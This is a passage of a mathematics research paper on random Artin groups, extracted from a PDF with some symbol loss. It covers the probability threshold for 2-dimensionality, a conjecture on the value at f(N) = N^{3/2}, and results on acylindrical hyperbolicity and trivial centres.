+ (11) Aut(AΓ) ∼= AΓ ⋊ Out(AΓ), where Out(AΓ) ∼= Aut(Γ) × (Z/2Z) is finite.
610
+ Proof. Let AK be the class of XXL free-of-infinity Artin groups, and let AL := AIrr ∩ ACon ∩ AK. Using
611
+ Lemma 2.7 and Lemma 2.10 we can see that Pf
612
+
613
+ AΓ ∈ AL
614
+
615
+ = Pf
616
+
617
+ AΓ ∈ AK
618
+
619
+ . By Theorem 2.9, an Artin
620
+ group AΓ picked at random (relatively to f) is asymptotically almost surely in AL. The various results
621
+ given in Conjecture 2.2 concern families of Artin groups that all contain the family AL. In particular,
622
+ every Artin group in AL satisfies the 11 points of the Corollary.
623
+
624
+ 3. Two-dimensional Artin groups.
625
+ This section aims at studying from our probabilistic point of view the family of 2-dimensional Artin
626
+ groups. This family is particularly important in the study of Artin groups, and many authors in the
627
+ literature have obtained strong results for this class (see Conjecture 2.2).
628
+ Our goal will be to show that if f(N) ≻ N 3/2 then asymptotically almost surely a random Artin group
629
+ (relative to f) will be 2-dimensional and if f(N) ≺ N 3/2 then asymptotically almost surely a random
630
+ Artin group (relative to f) will not be 2-dimensional. In particular, we will be able to improve the result
631
+ of Corollary 2.11, thus proving Theorem 1.4.
632
+ The condition of being 2-dimensional (see Definition 2.1.(1)) is quite specific, which makes it hard to
633
+ compute the “size” of the family. As it turns out, the size of this family is comparable to the size of
634
+ another family of Artin groups, which will turn out to be easier to compute (see Lemma 3.2 and Theorem
635
+ 3.3). This other family resembles the family introduced in [Blu21]. We introduce it thereafter:
636
+ Definition 3.1. We say an Artin group AΓ is (2, 2)–free if Γ does not have any two adjacent edges
637
+ labelled by 2. We denote by AB the family of (2, 2)-free Artin groups.
638
+ The following lemma is a key result. It will allow us to restrict to the study of (2, 2)-free Artin groups,
639
+ as asymptotically this family has the same size as the family AD of 2-dimensional Artin groups.
640
+ Lemma 3.2. For all non-decreasing divergent functions f : N → N, we have:
641
+ • Pf
642
+
643
+ AΓ ∈ AD
644
+
645
+ ≤ Pf
646
+
647
+ AΓ ∈ AB
648
+
649
+ ;
650
+
651
+ RANDOM ARTIN GROUPS
652
+ 9
653
+ • Further, if f(N) ≻ N, then Pf
654
+
655
+ AΓ ∈ AD
656
+
657
+ = Pf
658
+
659
+ AΓ ∈ AB
660
+
661
+ .
662
+ Proof. The probability that a defining graph Γ picked at random gives rise to a 2-dimensional Artin
663
+ group can be found by conditioning on the event “Γ ∈ B”:
664
+ (∗)
665
+ P
666
+
667
+ Γ ∈ D | Γ ∈ GN,f(N)�
668
+ = P
669
+
670
+ Γ ∈ D | (Γ ∈ B) ∩ (Γ ∈ GN,f(N))
671
+
672
+ P
673
+
674
+ Γ ∈ B | Γ ∈ GN,f(N)�
675
+ + P
676
+
677
+ Γ ∈ D | (Γ ̸∈ B) ∩ (Γ ∈ GN,f(N))
678
+
679
+ P
680
+
681
+ Γ ̸∈ B | Γ ∈ GN,f(N)�
682
+ Note that once we have two adjacent edges e1, e2 labelled by 2, then the probability that the triangle
683
+ spanned by {e1, e2} generates an Artin groups of spherical type is exactly the probability that the last
684
+ edge is not labelled by ∞. This probability is f(N)−1
685
+ f(N) , hence we have
686
+ P
687
+
688
+ Γ ∈ D | (Γ ̸∈ B) ∩ (Γ ∈ GN,f(N))
689
+
690
+ ≤ 1 − f(N) − 1
691
+ f(N)
692
+ =
693
+ 1
694
+ f(N).
695
+ Whence we get the following upper bound for (∗):
696
+ P
697
+
698
+ Γ ∈ D | Γ ∈ GN,f(N)�
699
+ ≤ P
700
+
701
+ Γ ∈ B | Γ ∈ GN,f(N)�
702
+ + P
703
+
704
+ Γ ̸∈ B | Γ ∈ GN,f(N)�
705
+ ·
706
+ 1
707
+ f(N).
708
+ We now deal with the lower bound. The probability that a given triangle ∆ is not of spherical type is
709
+ the quotient
710
+ # ways that ∆ can be spherical
711
+ # possible coefficients on ∆
712
+ .
713
+ (∗∗)
714
+ In our case, it is given that AΓ is (2, 2)-free, so the only triangles which are not of spherical type are of
715
+ the form (2, 3, 3); (2, 3, 4) or (2, 3, 5). When considering the possible permutations of the order of the
716
+ coefficients, this gives 15 possibilities. This gives the numerator of (∗∗).
717
+ A clear upper bound for the denominator of (∗∗) is f(N)3. However, it may not be equal to f(N)3,
718
+ as the condition of being (2, 2)-free coming from other edges in the graph could force some edges of ∆ to
719
+ not be labelled by 2. That said, the only triplet of coefficients for ∆ that could be forbidden by adjacent
720
+ edges would be those containing at least one edge labelled with 2. This number is bounded by 3N, thus
721
+ the denominator of (∗∗) admits f(N)3 − 3N as lower bound.
722
+ Putting everything together, we obtain
723
+ 15
724
+ f(N)3 ≤ # ways that ∆ can be spherical
725
+ # possible coefficients on ∆
726
+
727
+ 15
728
+ f(N)3 − 3N .
729
+ (∗ ∗ ∗)
730
+ Hence, by an union bound we get:
731
+ P
732
+
733
+ Γ ̸∈ D | (Γ ∈ B) ∩ (Γ ∈ GN,f(N))
734
+
735
+
736
+
737
+ ∆ triangle in Γ
738
+ P
739
+
740
+ ∆ is of spherical type | (Γ ∈ B) ∩ (Γ ∈ GN,f(N))
741
+
742
+
743
+ �N
744
+ 3
745
+
746
+ 15
747
+ f(N)3 − 3N .
748
+ Therefore:
749
+ P
750
+
751
+ Γ ∈ D | Γ ∈ GN,f(N)�
752
+
753
+
754
+ 1 −
755
+ �N
756
+ 3
757
+
758
+ 15
759
+ f(N)3 − 3N
760
+
761
+ P
762
+
763
+ Γ ∈ B | Γ ∈ GN,f(N)�
764
+ .
765
+ (∗ ∗ ∗∗)
766
+ Now for any non-decreasing divergent function f we have that
767
+ 1
768
+ f(N) → 0 hence
769
+ Pf
770
+
771
+ AΓ ∈ AD
772
+
773
+ = lim
774
+ N→∞ P
775
+
776
+ Γ ∈ D | Γ ∈ GN,f(N)� (∗)
777
+
778
+ lim
779
+ N→∞ P
780
+
781
+ Γ ∈ B | Γ ∈ GN,f(N)�
782
+ = Pf
783
+
784
+ AΓ ∈ AB
785
+
786
+ .
787
+ If f(N) ≻ N it is not hard to see that
788
+ lim
789
+ N→∞
790
+ ��N
791
+ 3
792
+
793
+ 15
794
+ f(N)3 − 3N
795
+
796
+ = 0.
797
+
798
+ 10
799
+ ANTOINE GOLDSBOROUGH AND NICOLAS VASKOU
800
+ This means that
801
+ Pf
802
+
803
+ AΓ ∈ AD
804
+
805
+ = lim
806
+ N→∞ P
807
+
808
+ Γ ∈ D | Γ ∈ GN,f(N)� (∗∗∗∗)
809
+
810
+ lim
811
+ N→∞ P
812
+
813
+ Γ ∈ B | Γ ∈ GN,f(N)�
814
+ = Pf
815
+
816
+ AΓ ∈ AB
817
+
818
+ .
819
+
820
+ We now move towards determining for which (non-decreasing divergent) functions an Artin group
821
+ picked at random is asymptotically almost surely 2-dimensional, or not 2-dimensional. In view of Lemma
822
+ 3.2, looking at (2, 2)-free Artin groups will be enough to give a conclusion for 2-dimensional Artin groups.
823
+ The result we want to prove is the following:
824
+ Theorem 3.3. Let f : N → N, and let AΓ be an Artin group picked at random (relatively to f). Then:
825
+ (1) If f(N) ≻ N 3/2, then asymptotically almost surely AΓ is 2-dimensional.
826
+ (2) If f(N) ≺ N 3/2, then asymptotically almost surely AΓ is not 2-dimensional.
827
+ (3) If f(N) = N 3/2 then then Pf
828
+
829
+ AΓ ∈ D
830
+
831
+ ≤ 2/3.
832
+ Proof. Let f be any non-decreasing, divergent function. We need to compute Pf
833
+
834
+ AΓ ∈ AD
835
+
836
+ . In view of
837
+ Lemma 3.2, it is enough to compute Pf
838
+
839
+ AΓ ∈ AB
840
+
841
+ , i.e. the probability that an Artin group AΓ picked at
842
+ random is (2, 2)-free. To do this, we will use the second moment method.
843
+ Let us consider a graph Γ ∈ GN,f(N). For any ordered triplet (v1, v2, v3) of distinct vertices of Γ, we
844
+ let I(v1,v2,v3) : GN,f(N) → {0, 1} be the random variable which takes 1 on Γ ∈ GN,f(N) precisely when
845
+ (v1, v2, v3) spans a triangle with mv1,v2 = mv1,v3 = 2. We let
846
+ X =
847
+
848
+
849
+
850
+ (v1,v2,v3)∈V (Γ)3
851
+ I(v1,v2,v3)
852
+
853
+ � : GN,f(N) → N
854
+ where the sum is taken over all triplets of distinct vertices. The variable X counts the number of pairs
855
+ of adjacent edges labelled by a 2, twice (because of the permutation of these edges).
856
+ We can compute the expectation E
857
+
858
+ I(v1,v2,v3)
859
+
860
+ = f(N)−2 and hence
861
+ E
862
+
863
+ X
864
+
865
+ =
866
+
867
+ (v1,v2,v3)
868
+ E
869
+
870
+ I(v1,v2,v3)
871
+
872
+ = N(N − 1)(N − 2)f(N)−2
873
+ ∼ N 3f(N)−2.
874
+ Now, we use the second moment method, as in ([CF12], Theorem 6):
875
+ P
876
+
877
+ X ̸= 0
878
+
879
+ ≥ E
880
+
881
+ X
882
+ �2
883
+ E
884
+
885
+ X2�.
886
+ We have already computed E
887
+
888
+ X
889
+
890
+ , so we now compute E
891
+
892
+ X2�
893
+ by dividing into several cases the sum
894
+ X2 =
895
+
896
+ I(v1,v2,v3)I(w1,w2,w3).
897
+ Note that the sum is taken over all ordered triplets (v1, v2, v3) and (w1, w2, w3) of vertices, where the
898
+ vi’s are distinct, and the wi’s are distinct. In a triangle (v1, v2, v3) such that mv1,v2 = mv1,v3 = 2, we
899
+ shall call v1 the central vertex of the triangle.The different cases are treated below. They can be seen
900
+ in Figure 3.
901
+ Case 1: Let X1 denote the sum of products I(v1,v2,v3)I(w1,w2,w3) such that no vertex appears in both
902
+ triples. Then
903
+ E
904
+
905
+ X1
906
+
907
+ =
908
+ N!
909
+ (N − 6)!f(N)−4 ∼ N 6f(N)−4.
910
+ Case 2: Let X2 denote the sum of products I(v1,v2,v3)I(w1,w2,w3) such that these two triangles share
911
+ exactly one vertex and the vertex they share is central in both triangles (i.e. v1 = w1). Then we have
912
+ E
913
+
914
+ X2
915
+
916
+ =
917
+ N!
918
+ (N − 5)!f(N)−4 ∼ N 5f(N)−4.
919
+
920
+ RANDOM ARTIN GROUPS
921
+ 11
922
+ Case 3: Let X3 denote the sum of products I(v1,v2,v3)I(w1,w2,w3) such that these two triangles share
923
+ exactly one vertex, where this vertex is the central vertex for one triangle and not a central vertex for
924
+ the other triangle (for example v2 = w1). In this case, we get:
925
+ E
926
+
927
+ X3
928
+
929
+ = 4
930
+ N!
931
+ (N − 5)!f(N)−4 ∼ 4N 5f(N)−4.
932
+ Case 4: Let X4 denote the sum of products I(v1,v2,v3)I(w1,w2,w3) such that these two triangles share
933
+ exactly one vertex, where this vertex is not central for either triangle (for example v2 = w2). Then
934
+ E
935
+
936
+ X4
937
+
938
+ = 4
939
+ N!
940
+ (N − 5)!f(N)−4 ∼ 4N 5f(N)−4.
941
+ Case 5: Let X5 denote the sum of products I(v1,v2,v3)I(w1,w2,w3) such that these two triangles share
942
+ exactly two vertices and these two vertices are not central for either triangle (for example v2 = w2 and
943
+ v3 = w3). In this case
944
+ E
945
+
946
+ X5
947
+
948
+ = 2
949
+ N!
950
+ (N − 4)!f(N)−4 ∼ 2N 4f(N)−4.
951
+ Case 6: Let X6 denote the sum of products I(v1,v2,v3)I(w1,w2,w3) such that these two triangles share
952
+ exactly two vertices and one of these is central in both triangles and the other is not (for example v1 = w1
953
+ and v3 = w2). In this case
954
+ E
955
+
956
+ X6
957
+
958
+ = 4
959
+ N!
960
+ (N − 4)!f(N)−3 ∼ 4N 4f(N)−3.
961
+ Case 7: Let X7 denote the sum of products I(v1,v2,v3)I(w1,w2,w3) such that these two triangles share
962
+ exactly two vertices where one of these is central for the triangle (v1, v2, v3) but not for (w1, w2, w3), and
963
+ the other vertex is central for the triangle (w1, w2, w3) but not for (v1, v2, v3) (for example v1 = w3 and
964
+ w1 = v3). In this case we have:
965
+ E
966
+
967
+ X7
968
+
969
+ = 4
970
+ N!
971
+ (N − 4)!f(N)−3 ∼ 4N 4f(N)−3.
972
+ Case 8: Let X8 denote the sum of products I(v1,v2,v3)I(w1,w2,w3) such that these two triangles share
973
+ all three vertices, and such the central vertices of both triangles are the same (i.e. v1 = w1). In this case,
974
+ we have:
975
+ E
976
+
977
+ X8
978
+
979
+ = 2
980
+ N!
981
+ (N − 3)!f(N)−2 ∼ 2N 3f(N)−2.
982
+ Case 9: Let X9 denote the sum of products I(v1,v2,v3)I(w1,w2,w3) such that these two triangles share
983
+ all three vertices, and such that the central vertex of the first triangle is not the central vertex of the
984
+ second triangle (for example v1 = w2). Then the three edges of the triangle must be labelled by a 2, and
985
+ we get
986
+ E
987
+
988
+ X9
989
+
990
+ = 4
991
+ N!
992
+ (N − 3)!f(N)−3 ∼ 2N 3f(N)−3.
993
+ Therefore, we have
994
+ E
995
+
996
+ X2�
997
+ E
998
+
999
+ X
1000
+ �2 =
1001
+ 8
1002
+
1003
+ i=1
1004
+ E
1005
+
1006
+ Xi
1007
+
1008
+ E
1009
+
1010
+ X
1011
+ �2
1012
+ ∼ N 6f(N)−4 + 9N 5f(N)−4 + 2N 4f(N)−4 + 8N 4f(N)−3 + 2N 3f(N)−3 + 2N 3f(N)−2
1013
+ N 6f(N)−4
1014
+ ∼ 1 + 9
1015
+ N + 2
1016
+ N 2 + 8f(N)
1017
+ N 2
1018
+ + 4f(N)
1019
+ N 3
1020
+ + 2f(N)2
1021
+ N 3
1022
+ .
1023
+ Hence, if f(N) ≺ N 3/2 then by definition there exists a non-decreasing divergent function h such that
1024
+ f(N)h(N) = N 3/2. In this case we get:
1025
+
1026
+ 12
1027
+ ANTOINE GOLDSBOROUGH AND NICOLAS VASKOU
1028
+ Figure 2. From top-left to bottom-right: the 9 cases described in the proof of Theorem
1029
+ 3.3. The edges that are not explicitly labelled by 2 can be labelled by any coefficient,
1030
+ including ∞.
1031
+ P
1032
+
1033
+ X ̸= 0
1034
+
1035
+
1036
+
1037
+ �E
1038
+
1039
+ X2�
1040
+ E
1041
+
1042
+ X
1043
+ �2
1044
+
1045
+
1046
+ −1
1047
+
1048
+
1049
+ 1 + 9
1050
+ N + 2
1051
+ N 2 +
1052
+ 8
1053
+ h(N)N 1/2 +
1054
+ 4
1055
+ h(N)N 3/2 +
1056
+ 2
1057
+ h(N)2
1058
+ �−1
1059
+ .
1060
+ When f(N) ≺ N 3/2, we obtain
1061
+ Pf
1062
+
1063
+ AΓ ∈ AB
1064
+
1065
+ = lim
1066
+ N→∞ P
1067
+
1068
+ Γ ∈ B | Γ ∈ GN,f(N)�
1069
+ = lim
1070
+ N→∞ P
1071
+
1072
+ X = 0
1073
+
1074
+ = 1 − lim
1075
+ N→∞ P
1076
+
1077
+ X ̸= 0
1078
+
1079
+ = 0.
1080
+ Thus asymptotically almost surely AΓ is not (2, 2)–free. In view of Lemma 3.2, this also means that
1081
+ asymptotically almost surely AΓ is not of dimension 2, this proves item 2 in Theorem 3.3.
1082
+ We note that the above calculation allows us to find a lower bound for Pf
1083
+
1084
+ AΓ ∈ AB
1085
+
1086
+ at f(N) = N 3/2.
1087
+ Indeed, this is equivalent to saying that h(N) = 1 and hence we get P
1088
+
1089
+ X ̸= 0
1090
+
1091
+
1092
+ 1
1093
+ 3, and so at
1094
+ f(N) = N 3/2 we have Pf
1095
+
1096
+ AΓ ∈ AB
1097
+
1098
+ ≤ 2
1099
+ 3. Hence by Lemma 3.2, this proves item 3 in the Theorem.
1100
+ We note that P
1101
+
1102
+ Γ ∈ B | Γ ∈ GN,f(N)�
1103
+ = 1 − P
1104
+
1105
+ X ≥ 1
1106
+
1107
+ and by the Markov inequality:
1108
+ P
1109
+
1110
+ X ≥ 1
1111
+
1112
+ ≤ E
1113
+
1114
+ X
1115
+
1116
+ ≤ N 3f(N)−2.
1117
+ Hence if f(N) ≻ N 3/2 then we can write f(N) = N 3/2g(N) for some non-decreasing divergent function
1118
+ g : N → N and in this case
1119
+ P
1120
+
1121
+ X ≥ 1
1122
+
1123
+
1124
+ 1
1125
+ g(N)2 .
1126
+ Therefore, for f(N) ≻ N 3/2 we have
1127
+ Pf
1128
+
1129
+ AΓ ∈ AB
1130
+
1131
+ = lim
1132
+ N→∞ P
1133
+
1134
+ Γ ∈ B | GN,f(N)�
1135
+ = 1 − lim
1136
+ N→∞ P
1137
+
1138
+ X ≥ 1
1139
+
1140
+ ≥ 1 − lim
1141
+ N→∞
1142
+ 1
1143
+ g(N)2 = 1.
1144
+ In particular, asymptotically almost surely AΓ is (2, 2)–free. By applying Lemma 3.2 (as f(N) ≻ N),
1145
+ we get that asymptotically almost surely AΓ is 2-dimensional. This proves item 1 and hence Theorem
1146
+ 3.3.
1147
+
1148
+ We are now able to prove a refinement of Corollary 2.11:
1149
+
1150
+ 02
1151
+ 01
1152
+ otm
1153
+ W2
1154
+ 2
1155
+ 2
1156
+ 2
1157
+ 2
1158
+ V2
1159
+ 2
1160
+ 2
1161
+ 2
1162
+ 2
1163
+ 2
1164
+ 2
1165
+ 2
1166
+ 2
1167
+ 03
1168
+ m
1169
+ w3
1170
+ W3
1171
+ U3
1172
+ V2
1173
+ U3
1174
+ W3
1175
+ V2
1176
+ 01
1177
+ U1
1178
+ W1
1179
+ 2
1180
+ 2
1181
+ 2
1182
+ 2
1183
+ 2
1184
+ 02
1185
+ 2
1186
+ 2
1187
+ U1
1188
+ 02
1189
+ 2
1190
+ W2
1191
+ 2
1192
+ 2
1193
+ U3
1194
+ W3
1195
+ 03
1196
+ V3
1197
+ 01
1198
+ 01
1199
+ Im
1200
+ 1
1201
+ W2
1202
+ =
1203
+ 2
1204
+ 02
1205
+ W2
1206
+ 2
1207
+ 2
1208
+ 2
1209
+ 2
1210
+ 2
1211
+ 2
1212
+ Im
1213
+ V2
1214
+ U3
1215
+ U2
1216
+ 2
1217
+ 03RANDOM ARTIN GROUPS
1218
+ 13
1219
+ Corollary 3.4. Let f : N → N be a function satisfying f(N) ≻ N 3/2. Then an Artin group AΓ picked
1220
+ at random (relatively to f) satisfies any of the following property asymptotically almost surely:
1221
+ (1) AΓ is torsion-free;
1222
+ (2) AΓ has trivial centre;
1223
+ (3) AΓ has solvable word and conjugacy problems;
1224
+ (4) AΓ satisfies the K(π, 1)-conjecture;
1225
+ (5) The set of parabolic subgroups of AΓ is closed under arbitrary intersections;
1226
+ (6) AΓ is acylindrically hyperbolic;
1227
+ (7) AΓ satisfies the Tits Alternative.
1228
+ Proof. By Theorem 3.3, AΓ is asymptotically almost surely 2-dimensional. Using Lemma 3.2, AΓ is also
1229
+ asymptotically almost surely (2, 2)-free. Using Lemma 2.7, we also know that AΓ is asymptotically almost
1230
+ surely irreducible. Using Lemma 2.10 twice, this ensures that AΓ is asymptotically almost surely in the
1231
+ class
1232
+ AK := AIrr ∩ AD ∩ AB.
1233
+ Note that the results given in Conjecture 2.2 for the points 1, 2, 3, 4, 5, 7 and 10 concern families of
1234
+ Artin groups that all contain AK. In particular, every Artin group of AK satisfies the 7 points of this
1235
+ Corollary.
1236
+
1237
+ What happens at f(N) = N 3/2 ?
1238
+ Finding out the exact probability for an Artin group to be 2-dimensional (or equivalently, (2, 2)–free)
1239
+ at f(N) = N 3/2 requires more work. In Theorem 3.3, we gave an upper bound for this probability. The
1240
+ goal of the following lemma is to give an explicit formula for the value of Pf
1241
+
1242
+ AΓ ∈ AB
1243
+
1244
+ at f(N) = N 3/2.
1245
+ Later, we give a conjecture on the exact value.
1246
+ Lemma 3.5. For all non-decreasing, divergent functions f : N → N we have that
1247
+ Pf
1248
+
1249
+ AΓ ∈ AB
1250
+
1251
+ = lim
1252
+ N→∞
1253
+ �f(N) − 1
1254
+ f(N)
1255
+ �(
1256
+ N
1257
+ 2)
1258
+
1259
+
1260
+ ⌊N/2⌋
1261
+
1262
+ k=1
1263
+ N!(f(N) − 1)−k
1264
+ (N − 2k)! k! 2k + 1
1265
+
1266
+ � .
1267
+ Proof. Let Ek be the family of defining graphs that have exactly k edges labelled by a 2, and consider
1268
+ the associated family AEk of Artin groups. Note that each edge is attached to two vertices, so by the
1269
+ pigeonhole principle, if k > N/2 then Pf
1270
+
1271
+ Γ ∈ B ∩ Ek
1272
+
1273
+ = 0. Hence
1274
+ P
1275
+
1276
+ Γ ∈ B | Γ ∈ GN,f(N)�
1277
+ =
1278
+ ⌊N/2⌋
1279
+
1280
+ k=0
1281
+ P
1282
+
1283
+ Γ ∈ B ∩ Ek |Γ ∈ GN,f(N)�
1284
+ .
1285
+ As usual, the total number of graphs in GN,f(N) is f(N)(
1286
+ N
1287
+ 2). On the other hand, we must compute
1288
+ how many of these graphs have exactly k edges labelled by a 2, while these edges are never adjacent.
1289
+ First of all, when k = 0, we have P
1290
+
1291
+ Γ ∈ B ∩ Ek | Γ ∈ GN,f(N)�
1292
+ =
1293
+
1294
+ f(N)−1
1295
+ f(N)
1296
+ �(
1297
+ N
1298
+ 2)
1299
+ .
1300
+ For the case when 0 < k ≤ ⌊N/2⌋, we look at how many ways we have of placing the k edges labelled
1301
+ by a 2. For the first such edge, we have
1302
+ �N
1303
+ 2
1304
+
1305
+ choices. The two vertices of the first edge must not appear
1306
+ in any other edge labelled by a 2, so for the second edge we only have
1307
+ �N−2
1308
+ 2
1309
+
1310
+ choices left. This goes on
1311
+ until the k-th edge labelled by a 2, for which we have
1312
+ �N−2(k−1)
1313
+ 2
1314
+
1315
+ choices. As the order in which we have
1316
+ chosen these edges do not matter, we must divide this product by k!. Now for the remaining
1317
+ �N
1318
+ 2
1319
+
1320
+ − k
1321
+ edges, we can use any label other than a 2. Hence we multiply the previous product by (f(N) − 1)(
1322
+ N
1323
+ 2)−k.
1324
+ Hence, for 0 < k ≤ ⌊N/2⌋, we have
1325
+ P
1326
+
1327
+ Γ ∈ B ∩ Ek | Γ ∈ GN,f(N)�
1328
+ = (f(N) − 1)(
1329
+ N
1330
+ 2)−k · �k−1
1331
+ i=0
1332
+ �N−2i
1333
+ 2
1334
+
1335
+ f(N)(
1336
+ N
1337
+ 2) · k!
1338
+ .
1339
+
1340
+ 14
1341
+ ANTOINE GOLDSBOROUGH AND NICOLAS VASKOU
1342
+ Therefore:
1343
+ Pf
1344
+
1345
+ AΓ ∈ AB
1346
+
1347
+ = lim
1348
+ N→∞
1349
+ ⌊N/2⌋
1350
+
1351
+ k=1
1352
+ P
1353
+
1354
+ Γ ∈ B ∩ Ek | Γ ∈ GN,f(N)�
1355
+ + P
1356
+
1357
+ Γ ∈ B ∩ E0 | Γ ∈ GN,f(N)�
1358
+ = lim
1359
+ N→∞
1360
+ ⌊N/2⌋
1361
+
1362
+ k=1
1363
+ (f(N) − 1)(
1364
+ N
1365
+ 2)−k · �k−1
1366
+ i=0
1367
+ �N−2i
1368
+ 2
1369
+
1370
+ f(N)(
1371
+ N
1372
+ 2) · k!
1373
+ +
1374
+ �f(N) − 1
1375
+ f(N)
1376
+ �(
1377
+ N
1378
+ 2)
1379
+ = lim
1380
+ N→∞
1381
+ �f(N) − 1
1382
+ f(N)
1383
+ �(
1384
+ N
1385
+ 2)
1386
+
1387
+
1388
+ ⌊N/2⌋
1389
+
1390
+ k=1
1391
+ N!(f(N) − 1)−k
1392
+ (N − 2k)! k! 2k + 1
1393
+
1394
+
1395
+ where we go from the second to the third line by noting that
1396
+ k−1
1397
+
1398
+ i=0
1399
+ �N − 2i
1400
+ 2
1401
+
1402
+ = 1
1403
+ 2k N(N − 1)(N − 2) . . . (N − 2(k − 1))(N − 2(k − 1) − 1) =
1404
+ N!
1405
+ (N − 2k)!2k .
1406
+
1407
+ Now, by Lemma 3.2 at f(N) = N 3/2 we have Pf
1408
+
1409
+ AΓ ∈ AD
1410
+
1411
+ = Pf
1412
+
1413
+ AΓ ∈ AB
1414
+
1415
+ , hence Lemma 3.5 also
1416
+ holds for Pf
1417
+
1418
+ AΓ ∈ AD
1419
+
1420
+ . We have computed this expression in Python for N up to 190, which leads us to
1421
+ the following conjecture.
1422
+ Conjecture 3.6. For f(N) = N 3/2 we have:
1423
+ Pf
1424
+
1425
+ AΓ ∈ AB] = 1 − e−1.
1426
+ In particular, we also have:
1427
+ Pf
1428
+
1429
+ AΓ ∈ AD
1430
+
1431
+ = 1 − e−1.
1432
+ 4. Acylindrical hyperbolicity and centres.
1433
+ Two open questions in the study of Artin groups is whether all irreducible non-spherical Artin groups
1434
+ are acylindrically hyperbolic and have trivial centres (see Conjecture 2.2). In this section, we study these
1435
+ two aspects of Artin groups for another family of Artin groups, that we will denote ACC. The families
1436
+ of Artin groups studied in Section 2 and 3 are very large when f(N) grows fast enough compared to N.
1437
+ While the spirit of this section resembles that of Sections 2 and 3, ACC will turn out to be very large
1438
+ when f(N) grows slowly enough compared to N.
1439
+ Definition 4.1. A graph Γ is said to be a cone if it has a join decomposition as a subgraph consisting
1440
+ of a single vertex v0 and a subgraph Γ′ such that Γ = v0 ∗ Γ′. Let C be the class of defining graphs that
1441
+ are cones and CC the class of defining graphs which are not cones.
1442
+ Recall that Irr is the class of irreducible graphs. By [KO22, Theorem 1.4], we have that if Γ has at
1443
+ least 3 vertices, is irreducible and is not a cone then AΓ is acylindrically hyperbolic. Hence it suffices to
1444
+ find the probability that a random Artin group is irreducible and is not a cone.
1445
+ Proposition 4.2. For all α ∈ (0, 1) and all non-decreasing functions f(N) ≺ N 1−α we have that
1446
+ Pf
1447
+
1448
+ AΓ ∈ ACC
1449
+
1450
+ = 1.
1451
+ Proof. Fix α ∈ (0, 1) and f(N) ≺ N 1−α a non-decreasing divergent function. Then, by definition, there
1452
+ exists a non-decreasing divergent function h such that f(N)h(N) = N 1−α.
1453
+
1454
+ RANDOM ARTIN GROUPS
1455
+ 15
1456
+ By the definition of a cone and by a union bound, we get:
1457
+ P
1458
+
1459
+ Γ ∈ C | Γ ∈ GN,f(N)�
1460
+
1461
+
1462
+ v0∈V (Γ)
1463
+ P
1464
+
1465
+ ∀u ∈ V (Γ) − v0 : mu,v0 ̸= ∞ | Γ ∈ GN,f(N)�
1466
+ =
1467
+
1468
+ v0∈V (Γ)
1469
+ �f(N) − 1
1470
+ f(N)
1471
+ �N−1
1472
+ = N
1473
+ �f(N) − 1
1474
+ f(N)
1475
+ �N−1
1476
+ = N
1477
+ ��f(N) − 1
1478
+ f(N)
1479
+ �f(N)�h(N)N α �
1480
+ f(N)
1481
+ f(N) − 1
1482
+
1483
+ .
1484
+ Thus:
1485
+ Pf
1486
+
1487
+ AΓ ∈ AC
1488
+
1489
+ = lim
1490
+ N→∞ P
1491
+
1492
+ Γ ∈ C | Γ ∈ GN,f(N)�
1493
+ = lim
1494
+ N→∞ Ne−N αh(N) = 0.
1495
+ Hence for f(N) ≺ N 1−α we have Pf
1496
+
1497
+ AΓ ∈ ACC
1498
+
1499
+ = 1, proving the proposition.
1500
+
1501
+ Corollary 4.3. Let α ∈ (0, 1) and let f(N) ≺ N 1−α be a non-decreasing divergent function. Then an
1502
+ Artin group picked at random (relatively to f) asymptotically almost surely is acylindrically hyperbolic
1503
+ and has a trivial centre.
1504
+ Proof. We note that by Lemma 2.7 and Lemma 2.10 we have Pf
1505
+
1506
+ AΓ ∈ AIrr ∩ ACC
1507
+
1508
+ = Pf
1509
+
1510
+ AΓ ∈ ACC
1511
+
1512
+ .
1513
+ As we noted above, by [KO22, Theorem 1.4], if Γ is irreducible and not a cone then AΓ is acylindrically
1514
+ hyperbolic. Hence, by Proposition 4.2, for a function f as in the statement of the Corollary, we get that
1515
+ a random Artin group (relatively to f) is asymptotically almost surely irreducible and a cone, hence
1516
+ asymptotically almost surely acylindrically hyperbolic.
1517
+ Further, by [CMW19, Theorem 3.3], we have that if Γ is irreducible and not a cone then AΓ has
1518
+ trivial centre. Hence a random Artin group (relatively to f) asymptotically almost surely has a trivial
1519
+ centre.
1520
+
1521
+ Let α ∈ (0, 1), by Corollary 4.3 and Corollary 3.4-6, we have shown that for all non-decreasing divergent
1522
+ functions f such that either:
1523
+ • f(N) ≺ N 1−α
1524
+ • f(N) ≻ N 3/2
1525
+ a random Artin group AΓ (relatively to f) is asymptotically almost surely acylindrically hyperbolic and
1526
+ has trivial centre. This motivates the following:
1527
+ Question: For which non-decreasing divergent functions f do we have that a random Artin group
1528
+ (relatively to f) is asymptotically almost surely acylindrically hyperbolic and has trivial centre?
1529
+ References
1530
+ [BHS17]
1531
+ Jason Behrstock, Mark F. Hagen, and Alessandro Sisto. Thickness, relative hyperbolicity, and randomness in
1532
+ Coxeter groups. Algebr. Geom. Topol., 17(2):705–740, 2017. With an appendix written jointly with Pierre-
1533
+ Emmanuel Caprace.
1534
+ [Blu21]
1535
+ Martin Axel Blufstein. Parabolic subgroups of two-dimensional artin groups and systolic-by-function complexes,
1536
+ 2021.
1537
+ [CD95a]
1538
+ Ruth Charney and Michael W. Davis. The K(π, 1)-problem for hyperplane complements associated to infinite
1539
+ reflection groups. J. Amer. Math. Soc., 8(3):597–627, 1995.
1540
+ [CD95b]
1541
+ Ruth Charney and Michael W. Davis. The K(π, 1)-problem for hyperplane complements associated to infinite
1542
+ reflection groups. J. Amer. Math. Soc., 8(3):597–627, 1995.
1543
+ [CF12]
1544
+ Ruth Charney and Michael Farber. Random groups arising as graph products. Algebr. Geom. Topol., 12(2):979–
1545
+ 995, 2012.
1546
+ [CMV22]
1547
+ Mar´ıa Cumplido, Alexandre Martin, and Nicolas Vaskou. Parabolic subgroups of large-type artin groups. Math-
1548
+ ematical Proceedings of the Cambridge Philosophical Society, page 1–22, 2022.
1549
+ [CMW19] Ruth Charney and Rose Morris-Wright. Artin groups of infinite type: trivial centers and acylindrical hyperbol-
1550
+ icity. Proc. Amer. Math. Soc., 147(9):3675–3689, 2019.
1551
+
1552
+ 16
1553
+ ANTOINE GOLDSBOROUGH AND NICOLAS VASKOU
1554
+ [Dei20]
1555
+ Angelica Deibel. Random Coxeter groups. Internat. J. Algebra Comput., 30(6):1305–1321, 2020.
1556
+ [Hae22]
1557
